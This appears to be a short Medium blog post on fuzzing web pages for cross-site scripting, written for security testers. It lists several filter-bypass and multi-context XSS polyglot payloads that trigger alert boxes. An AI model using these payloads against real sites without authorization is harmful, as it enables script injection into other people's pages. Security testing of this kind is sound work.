Tactical Fuzzing — XSS

XSS

Core Idea: Does the page functionality display something to the users? For time sensitive testing the 80/20 rule applies. Many testers use Polyglot payloads. You probably have too!

*Multi-context, filter bypass based polyglot payload #1 (Rsnake XSS Cheat Sheet)

Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)

“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

%22})))}catch(e){alert(document.domain);}//

“]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

“a”)(({type:”ready”}));}catch(e){alert(1)}//

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store